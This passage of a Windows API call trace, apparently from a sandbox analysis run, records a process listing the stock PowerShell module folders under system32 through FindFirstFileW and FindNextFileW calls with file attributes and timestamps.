cAlternateFileName="MICROS~1.HOS")) returned 1 [0286.547] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0286.547] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0286.547] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0286.547] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0286.548] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0286.548] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0286.548] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0286.548] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0286.548] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0286.548] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0286.549] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0286.549] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0286.549] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0286.549] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0286.549] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0286.549] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0286.550] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0286.550] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0286.550] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0286.550] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0286.550] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0286.550] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0286.551] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0286.551] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0286.551] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0286.551] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0286.551] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0286.551] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0286.551] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0286.552] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0286.552] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0286.552] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0286.552] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0286.552] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0286.552] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0286.552] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0286.553] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0286.554] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0286.554] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0286.554] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0286.554] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0286.554] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0286.554] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0286.555] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0286.555] FindClose (in: hFindFile=0x25b73f76730 | out: hFindFile=0x25b73f76730) returned 1 [0286.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d5f0) returned 1 [0286.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d5b0) returned 1 [0286.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.555] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0286.555] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, 